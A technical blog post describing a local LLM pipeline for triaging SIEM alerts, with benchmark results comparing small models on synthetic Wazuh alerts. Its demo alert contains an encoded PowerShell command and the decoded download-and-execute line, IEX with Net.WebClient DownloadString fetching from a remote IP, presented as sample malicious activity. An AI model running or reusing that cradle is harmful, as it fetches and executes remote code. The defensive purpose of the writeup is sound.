Your First Agentic SOC Without the GPU Bill: Local LLM Triage on Apple Silicon

Every alert that lands in a SOC queue costs an analyst the same four questions. Who owns this host? Has this address appeared before? Is this the user’s own VPN egress? Was there an MFA push? The number of alerts is not the real pain. Answering the same four questions again, for every alert, is the pain.

The obvious fix is to point a cloud model at the queue, and a lot of teams can’t. Some environments don’t permit cloud models at all. Per-token pricing on a firehose of alerts adds up quickly. Some data can’t leave the jurisdiction. And a triage pipeline with a foreign model provider in the critical path is a dependency that can be switched off for reasons that have nothing to do with you.

One of us works in a bank. AI adoption there is deliberately careful, especially for anything that touches confidential data at volume, while AI adoption everywhere else in the company is pushing SOC alert counts up. The goal we set was that an analyst should be able to run this themselves on a 24 GB laptop, whether or not their org has approved an LLM. Nothing leaves the machine, so there is no vendor to approve, and it is read-only, so there is nothing it can break.

This post covers what we built for our HITCON 2026 talk, what we measured, and which of our own assumptions turned out to be wrong.

The bet

A model that fits in 24 GB next to a browser and a SIEM console is a 12B model at four-bit quantisation. Nobody would trust a 12B model to run a free-form agent loop over a security queue, and neither would we, so we went the other way:

Constrain the model. Don’t scale it.

The model sits inside a fixed pipeline and answers one narrow, schema-constrained question at a time. It never picks a tool, never chooses the next step, and never sees a running transcript. Routing, retries and looping are deterministic code.

We wrote down three predictions before we had any numbers, so we could score them at the end:

  • P1: it can do the job. A model this small can find real attacks hidden in noise and clear a convincing false positive.
  • P2: the pipeline is the safety. What makes it safe to use is the scaffolding around the model, not the model.
  • P3: freedom makes it worse. Every added degree of freedom, whether parameters, reasoning budget or free text, costs more than it buys.

We also wrote down three things we assumed and intended to test: bigger is better, more reasoning is better, and a cheap screening run predicts the real one. None of them held, as it turned out.

The shape

Nine steps, fixed order, six LLM calls.

Nine steps, fixed order, six LLM calls

Every decision in the design follows from one rule: the model only ever answers one narrow, schema-constrained question at a time. Every call uses Ollama’s JSON-schema-constrained generation with a Pydantic model as the schema. If the output fails validation, the step retries once with the validation error appended to the prompt. If it fails again, the step falls back to a safe default and the report is flagged for human review. There are no unbounded retries and no step that recurses.

The easiest way to see what that means in practice is to follow one alert through. This is the one we demo, as Wazuh delivers it:

rule       100075 · level 10 · Sysmon event 1 · MITRE T1027 + T1059.001
computer   DEV-KLYAM01.victimcorp.com
user       VICTIMCORP\ke.li.yam
image      powershell.exe
parent     wscript.exe  "C:\Users\ke.li.yam\Downloads\build-helper.js"
cmdLine    powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA...
source_ip        None
destination_ip   None

Forty-one alerts in the corpus match rule 100075 at level 10. Forty of them are developer tooling: git status --porcelain, npm run build, editor language servers. This is the one that is not. The SIEM cannot tell them apart, because the only discriminating evidence is inside the encoded blob and in the parent process.

The frames below are the tool’s own terminal view of this alert going through, captured at three points in one run.

Terminal view at the start of the run: nine steps listed in fixed order, the first complete, the second showing 'enforcing ExtractedIndicators'

The run starts. All nine steps are queued in a fixed order before anything happens, and the next step already names the schema it will hold the model to.

Step 1, ingest and parse. No model. The raw Wazuh document is validated against the internal Alert schema. The decoder has already supplied the MITRE techniques, so the model will never be asked to guess them. The investigation timeline is initialised here; every later step appends one entry, including steps that are skipped, which are logged with the reason. Nothing in a typed field points anywhere: no source IP, no destination IP. That gap is what step 2 exists to close.

Step 2, extract indicators. This is the first LLM call, and the pattern it establishes repeats everywhere the model touches structured data. Two sub-steps run and then merge behind a gate.

The deterministic half is regex over the typed fields and the command line, which finds victimcorp.com. Code also spots the -Enc flag and decodes the UTF-16LE base64 payload on its own. No model is involved; it is a printable-ratio check on a base64 and hex decode. The LLM half reads the same text, including the already-decoded payload, and returns a list of candidates, each typed as one of ip, domain, url, file_hash or email. It proposes what no regex was written for. Here that is the C2 address and URL sitting inside the decoded command:

IEX (New-Object Net.WebClient).DownloadString('http://45.146.164.110:8080/u')

ip    45.146.164.110
url   http://45.146.164.110:8080/u

Then the gate. Every candidate, whichever half proposed it, goes through the same strict per-type validator. Anything that fails is discarded, not corrected and not retried, and the timeline records the count: N proposed, M validated, K discarded. The model adds recall a regex cannot have, and it cannot inject anything, because nothing it proposes bypasses a validator that a hand-written regex would also face.

Step 3, enrich. No model, and skipped entirely if the merged indicator set is empty. A registry maps each indicator type to providers in a fixed priority order, IP to AbuseIPDB then VirusTotal, URL and domain and hash to VirusTotal, and it is static config. “Which provider should I ask” is exactly the open-ended choice that makes a 12B model hallucinate, so it is removed from the model’s responsibility entirely. Each lookup checks a cache first, sits behind a token-bucket rate limiter, and on any provider error records a typed failure and verdict unknown rather than aborting. The one conditional LLM call in the whole pipeline lives here: if two providers disagree about the same indicator, a reconciliation call picks a consolidated verdict from the same closed vocabulary the providers use. On this alert both indicators come back malicious. In the benchmark, enrichment was off and every indicator came back unknown, which matters later.

Step 4, gather context. No model. Rule metadata and agent context are pulled from the Wazuh manager API and added to the case file. It is the last step before the model is asked to think about any of it.

Step 5, correlate. The second LLM call, and the one place the graph has any variable length. Code builds up to four canonical searches from templates, and only the ones the alert actually has a field for: same source IP in 24 hours, same rule on the same host, same destination host, same command line environment-wide. Two of four run here, because there are no IPs. Over the hits, code computes distinct-value counts of destination hosts, ports, source IPs and target users. A bare match count cannot separate a broad sweep from repeated attempts against one target, and the counts can.

One schema then does two things at once. The model classifies pattern_type as one of brute_force, scanning, lateral_movement, none or other, and picks follow_up_query from the same four templates or none_needed. If it picks one, code runs that single templated query and appends the result. That is capped at one hop and never recurses. On this alert, 55 matches classified as none, and the follow-up re-ran the same-rule-same-host search for 27 more.

There is a second extension, and it is not the model’s decision at all. When the classifier returns none or other, code fires an open-value search: a separate call returns one string, the model proposes what to search for, and code runs it. The model chooses what, never whether. Here it proposed build-helper.js, the parent script.

Step 6, risk assessment. The third LLM call. The model sees only the structured findings gathered so far: pattern type, evidence count, enrichment verdicts, rule metadata, MITRE mapping, and the decoded command context capped at 500 characters. It does not see the raw log, and it does not see any earlier model output. The schema is three fields: severity as one of low, medium, high or critical, confidence as one of low, medium or high, and a free-text rationale. The design reserves a closed-list technique pick for alerts the decoder leaves unmapped, so the model is never asked for a free-text technique ID; today that branch isn’t built, and an unmapped alert simply records the gap as an uncertainty note. On this alert the decoder had already filled it in.

The safe default here is severity low and confidence low, and the report is marked for human review. In the stored benchmark report for this alert the model returned critical with high confidence, and its rationale named the -Enc flag, the wscript.exe parent, Invoke-Expression and Net.WebClient. The run captured here landed on high.

Terminal view after step 6: correlate took 368 seconds over two LLM calls, risk assessment returned severity high with high confidence, and draft report is enforcing both draft schemas

Six steps in. Correlate is the slow one, 368 seconds across its two calls, and the severity has just landed. The next row shows step 7 about to hold the model to both draft schemas at once.

One deliberate, gated exception to “never the raw log”. For alerts whose decoder mapped nothing at all, no command context and no typed fields, steps 6 to 8 also receive the raw log line, capped at 500 characters and labelled unvalidated. It was 10 of 71 live alerts. Measured, it moved zero verdicts across seven scenarios, so it buys visibility rather than accuracy, and it is the one prompt input no validator gates. That is acceptable while the alerts are ours; it would need revisiting before real SIEM data flows.

Step 7, draft the report. Calls four and five, from the same findings. Draft A is the canonical one: a plain-language summary, an expanded rationale, and recommended_actions as a multi-select from a closed catalogue of nineteen, things like “Escalate to the incident response / Tier 2 team”, “Preserve logs and evidence for the affected host”, “Manually review the decoded command payload”. Here it selected thirteen. Draft B runs in parallel with no catalogue: free-text actions, plus an experimental triage verdict of true positive, false positive or uncertain. Draft B is never audited, never shown as the verdict, and reaches the analyst only behind an experimental flag. We kept it so we could measure what the model says when nothing scopes it, and there is more on that below.

Step 8, self-check. The sixth call, and it is a fresh prompt rather than a continuation. It receives Draft A’s output plus the same structured findings Draft A saw, and not Draft A’s reasoning or any chat history, so it cannot rubber-stamp its own prior output. The claims are the summary, the rationale, and each recommended action. It returns one audit per claim: {claim, supported, correction}.

Code applies the result mechanically. If the audit count does not match the claim count, no corrections are applied and the mismatch is recorded. Otherwise, an unsupported summary or rationale is replaced with the correction if one was offered, an unsupported action is dropped, and if every action is dropped the pipeline inserts one: “Escalate to a human analyst for manual review”. The uncertainty notes are not written by the model at all. Code derives them from the structural gaps it can see: claims the self-check flagged, enrichment lookups that errored or returned unknown, a correlation menu that was never used, a missing MITRE mapping. The model’s own confidence rating is not consulted, and the benchmark later showed why: on this model, high confidence was less accurate than medium.

In the stored benchmark report for this alert every claim was audited, none was flagged, and each action traced to a structured finding. In the run captured here the self-check call itself failed, so no corrections were applied and the report went out flagged for a human. That is the other branch doing its job.

Step 9, finalise and persist. No model. The report is assembled and saved to SQLite and as JSON, and the alert moves to investigated. The report’s status is complete unless any step degraded to a safe default, in which case it is flagged for human review. The timeline carries every step’s typed input and output and, for every LLM call, the verbatim prompt, the raw response when parsing failed, the reasoning trace, tokens and latency.

Terminal view at the end of the run: all nine steps complete, self-check marked with a warning because its call failed, report persisted, 1432 seconds elapsed over seven LLM calls and 74,401 tokens

The finished run. Seven LLM calls, the six fixed ones plus the open-value search in step 5, and 24 minutes end to end on the laptop. The warning on self-check is the failed call from step 8; the report still persisted, flagged for review.

There is no remediation tool wired to the model, so the worst a bad report can do is waste an analyst’s time.

One consequence of building it this way is worth stating, because it caught us. During the benchmark, one candidate never loaded: Ollama’s loader could not read its ternary GGUF. Each of its eleven runs still exited successfully in about two seconds, having run every deterministic step and degraded every LLM step to its safe default: severity low, status needs human review, model version none. That is the design working as intended, and it is also a warning. A dead model can look exactly like a careful one. It is why the repo ships a go/no-go gate that probes structured output before a model is allowed anywhere near the pipeline.

The benchmark nobody publishes

Picking the model was the second problem. No public leaderboard tells you which local model can do this. Benchmarks measure reasoning, coding and trivia, not whether a model escalates benign Windows logons. Failures depend on the alert type, and each model fails on different types. And nothing published tells you what a model costs in RAM at the context you actually need.

So we measured it ourselves.

The corpus is 182 synthetic alerts on a seeded Wazuh stack, 130 of them graded, in four floods. Every alert in a flood is identical to the SIEM: same rule, same level. One field separates the target from the noise, and it reaches the model only through the rule description. Three of the floods hide one real attack each: PowerShell (40 benign to 1 needle, where the needle’s parent process is wscript.exe), email (35 to 1, separated by sender domain) and SSH (30 to 1, by user plus source address). The fourth flood, Windows logons, hides something different: among 18 routine logons sit two alerts for the one we cared most about getting right, an employee’s VPN login that looks alarming and is legitimate. A fifth group is an easy true-positive chain with no flood, contributing two more needles. That makes five hidden attacks in total, and two copies of the false-positive control.

Each finalist saw the VPN control six times, three runs on each of the two alerts. We call it the VPN test. This is what passing it looks like from the terminal:

Terminal view of the VPN control alert after all nine steps: severity low with high confidence, two actions selected, four claims audited and none flagged, 621 seconds elapsed over seven LLM calls

The VPN login through the same nine steps: severity low, two actions from the menu, four claims audited and none flagged. Ten minutes on the laptop, and nobody gets locked out.

Four scores per model:

  • Needle recall. Of the five hidden attacks, how many were rated high or critical. Higher is better.
  • VPN test. Of six runs on the false-positive control, how many escalated it. Zero is correct.
  • Severity distance. Mean gap, in severity levels, between the verdict and the nearest acceptable one.
  • Benign escalation. Of the sixty harmless alerts, how many were marked high or critical. Medium is allowed, because a held-for-review message genuinely earns a second look. Escalating is the error.
The winner's scorecard

Every number below comes from one frozen setup: 602 investigations (176 screen, 426 deep), zero crashes, zero missing reports, about 21 hours of local inference, prompt version 4d-v1, num_ctx=8192 baked into a Modelfile, enrichment off so that API quotas could not skew the ranking, temperature 0, measured 15 to 16 August 2026 on a 128 GB Mac Studio.

Eighteen configurations went through the gate. Two were dropped there, the bf16 and q8 builds of qwen3.6:27b, for blowing the 17.5 GiB budget we set for a laptop, and one, qwen3.8:27b, arrived after the sweep and was gated but never swept. Sixteen ran a screening pass. Eleven of those were removed, for never loading at all, taking 10 to 13 minutes per alert, failing the VPN test, alarming on everything, or not fitting. Five went to the deep stage at 71 alerts each, including one 64 GiB model that could never run on the laptop and was kept as a reference.

Results

The winner is the smallest serious candidate
modelbenign esc. ↓needle ↑VPN test ↓sev. dist. ↓medianfootprint
gpt-oss:120b @low20%60%0/60.2035s64.0 GiB
gpt-oss:20b @low45%80%0/60.3924s12.0 GiB
gemma4:12b47%100%0/60.39259s8.4 GiB
gemma4:26b-a4b-it-qat53%100%3/60.49155s15.0 GiB
lfm2:24b-a2b58%60%0/60.5210s14.0 GiB

Only one model did both, found all five hidden attacks and passed the VPN test, and it did so at the smallest memory footprint: gemma4:12b, four-bit GGUF, 8.4 GiB resident.

The runner-up is gpt-oss:20b at low reasoning effort. It is one false alarm quieter (27 against 28 of 60), eleven times faster, and it missed one attack. The 64 GiB reference model is the quietest thing we measured and still missed two of the five attacks the 8.4 GiB pick found.

So the first assumption, that bigger is better, did not hold. Scaling up buys noise suppression and costs detection, which makes it a move along a trade-off curve rather than an improvement. The three most conservative configurations we measured anywhere were also the three heaviest reasoners.

The second assumption failed in a worse way. More reasoning made things worse, and in the dangerous direction. Same model, gpt-oss:20b, low against default effort, n=71:

metric@low@default
benign escalation45%58%
severity distance0.390.63
needle recall80%80%
VPN test0/6 correct6/6 wrong

That is for 2.7 times the latency. The VPN address is genuinely unusual, and the longer the model reasons about it, the more it convinces itself the alert is real. Two of the five finalists fail this way, gpt-oss:20b at default effort and the 26B gemma at 3 of 6, so it is a property of the task rather than of one model. Our reading is that the state graph already supplies the structure and the grounding, so additional reasoning mostly gives the model room to argue itself out of the grounded answer.

The third assumption was that a cheap screening pass at n=4 would rank the survivors correctly. It ranked lfm2 above the model that beat it, and it placed gemma4:12b 28 points worse than it measured at n=60. A screen is useful for removing clear failures and useless for ranking the survivors.

The per-alert-type breakdown shows why a leaderboard position would not have helped:

Each model is blind in a different place

lfm2 flags every harmless PowerShell alert and almost no Windows logins. gemma4:26b is the exact opposite. Failures cluster by alert type, and the clusters invert between models. A model that wins on a public leaderboard can still be blind to your alerts.

The pick has a cost, and it is latency: 259 seconds per alert at the median on the Studio, p95 at 462, worst case 648, and slower on the laptop it was designed for. The reasoning-effort setting barely moves gemma4 (a 1.34x spread from low to high, against 28x on gpt-oss:20b), so roughly 220 seconds is the floor. That is too slow to watch in silence, so at the talk we kicked the investigation off live at the start of the deep-dive and walked through the pipeline while it ran, then read the finished report at the end.

What decides whether a model fits

Download size is the number everyone quotes, and it is not the one that decides whether a model fits.

KV cache, not weights, decides what fits on your laptop

Ollama sizes the KV cache from the model’s default context, and that allocation, not the weights, dominates resident memory. qwen3.6:27b measures 36.5 GB at its default and 16 GB at num_ctx=8192. The per-token cost of context varies 84x across the models we tested, uncorrelated with parameter count, and quantisation does not touch it: q4 and q8 of the same model measure exactly the same 69.2 MB per thousand tokens. This is invisible on a 128 GB Studio and decisive on a laptop.

Two practical consequences. Set num_ctx in a Modelfile variant, because setting it per request through the OpenAI-compatible endpoint does not stick; the model reloads at its default on the next call. And “newer” is not one number. qwen3.8:27b cut the per-token KV cost 15.7x against its predecessor, grew its base footprint by just enough to absorb all of the saving, and generates at half the speed. Under a 17.5 GiB budget both models max out at exactly the same context. A generation of architecture work bought zero extra context on a small machine.

One more thing, which cost us most of a day early on. gemma4:12b and gemma4:12b-mlx are the same weights behind two Ollama backends. Send both an identical response_format: json_schema request and the GGUF build returns valid JSON, because llama.cpp enforces the grammar at decode time. The MLX build wraps its answer in a markdown fence and every call fails, because that backend silently ignores the constraint. The model is pulled, reachable and chats fine. The failure is deterministic, so retrying buys nothing, and every investigation quietly degrades to a stub report marked “needs human review”, with nothing naming the backend as the cause. Test every model with a structured-output probe before you configure it. Downloaded does not mean working.

Freedom, measured

Every report answers “what should the analyst do” twice, from the same evidence. Draft A picks from the fixed menu of nineteen actions and ships. Draft B writes freely, and is recorded but never shown. We counted, on the sixty harmless alerts, how many reports recommended a disruptive action: block an IP, lock an account, isolate a machine.

Take away the menu, and the calmest model recommends disruption on 50 of 60 harmless alerts

gpt-oss:120b looks calm only because of the menu: zero disruptive recommendations with it, fifty without. gemma4:12b is calm by itself, 24 against 27. The closed vocabulary constrains what can be said without converging what is said, and on most of these candidates it is doing far more of the work than the model’s judgement.

The VPN false positive, in both columns:

Every gpt-oss run wants to lock this user out, even the runs that scored correctly

A medium score passes the VPN test. The same run’s free-written draft still says “immediately isolate the endpoint… force a password reset.” Every gpt-oss run, including the ones that scored correctly, wanted to lock the user out. gemma4:12b was the only model safe in both columns. A good score does not mean a harmless report.

The clearest example is a harmless held-for-review email from a real external auditor, subject “Audit evidence request”. Written freely, gemma4:12b recommends blocking the sender’s IP, 209.85.220.41, and the sender’s domain at the corporate firewall and email gateway. Run whois on that address and the OrgName is Google LLC. Block it, and Gmail stops delivering. About 70 per cent of the free-written drafts named a specific IP to act on; on another harmless alert, both gemmas wanted to terminate all SSH sessions associated with an address in TEST-NET-3, a documentation-only range.

None of that reached an analyst. Across all 426 deep reports, the self-check marked 1,517 claims as not supported by evidence. Risky actions were 24 per cent of what it flagged against 16 per cent of everything selected, so it leans toward the dangerous ones. Zero of the 300 actions it marked risky reached a final report. In 67 reports it deleted every action, and the pipeline inserted the safe default, which is to escalate to a human.

A 12B model on a laptop is safe to use, not because the model can be trusted, but because the pipeline never trusts it. The distance between “ask a human” and “block Gmail” is the pipeline.

The rough edges

We dissected the stored report for the base64 PowerShell needle, the alert we demo. Three things were imperfect. The validator accepted Net.WebClient, a .NET class name, as a domain-shaped string, because it checks format rather than plausibility; one wasted lookup returned not-found and changed nothing. The correlation follow-up re-runs a search the classifier already saw, so its hits land in the evidence count twice; the fix is known, either non-canonical templates or deduplicating by alert id, and it has not changed a verdict. And an earlier note recorded this alert as high across eight of eight runs while the stored artefact says critical; runs vary, and the audit trail is what makes that visible.

Severity landed critical, every action traced to real evidence, self-check found nothing to correct, and the report closed complete. The rough edges are in the plumbing, not the verdict, which is what the gating is for.

Two things we did not test. We never ran the full opposite design, a big model in a free agent loop, end to end. Every step toward freedom we measured made things worse, so the endpoint is predicted from the trend, not measured.

And we never ran enrichment for real. With no reputation provider registered, every indicator resolved to unknown for every model, so no model was ever rewarded for reading threat intelligence. That cuts two ways. gpt-oss:20b answers in 24 seconds against the winner’s 259 and already ties it on severity distance; given real threat intelligence it could be the model that ships. It also means some share of the winner’s 28 false alarms are probably alerts a reputation lookup would have settled. The email flood sits on shared mail-provider addresses and the SSH flood on a handful of source IPs, and in the benchmark every one of those came back unknown. We did not measure how many of the 28 that accounts for, so we are not going to guess. Enrichment on is the first run we would do next.

What we would tell you to do

Four things, all measured.

  1. Constrain before you scale. The pipeline carries the structure. A bigger model mostly uses the extra capacity to argue against the evidence.
  2. Use low reasoning effort wherever the model honours it, and verify that it honours it by counting reasoning characters, not by checking that the request did not error.
  3. Size by KV cache at your real context, not by download size. Bake num_ctx into a Modelfile variant.
  4. Measure on your own alert classes. Failures cluster, and the clusters invert between models. A leaderboard position does not transfer.

The winner still mislabels 28 of 60 harmless alerts, with the enrichment caveat above. But every one of those 28 reports still carries the correlated alerts, the user’s own VPN egress assignment, the approved MFA push, and the host and rule context. Fixing a wrong label takes seconds. Collecting the evidence takes twenty minutes. The agent does the twenty-minute part. The label is advice. The evidence is the product.

Everything above runs offline and is in the repo: the nine-step pipeline with 467 tests, the seeded Wazuh stack with its floods and needles, and the benchmark harness with the graded corpus. Run the gate first:

git clone https://github.com/u9u-p/local_siem_agent.git
cd local_siem_agent
python -m bench.stage0

It runs the structured-output probe, the effort check and the footprint measurement on your hardware, in minutes. Test your model before you trust it.

References